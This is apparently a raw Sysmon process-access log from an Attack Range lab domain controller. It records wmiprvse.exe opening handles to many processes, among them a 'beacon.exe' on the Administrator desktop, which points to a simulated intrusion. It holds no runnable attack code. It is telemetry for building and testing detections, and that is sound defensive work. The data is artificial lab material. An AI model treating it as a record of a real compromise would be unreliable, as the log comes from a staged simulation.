10341000x80000000000000002237328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.670{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.669{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 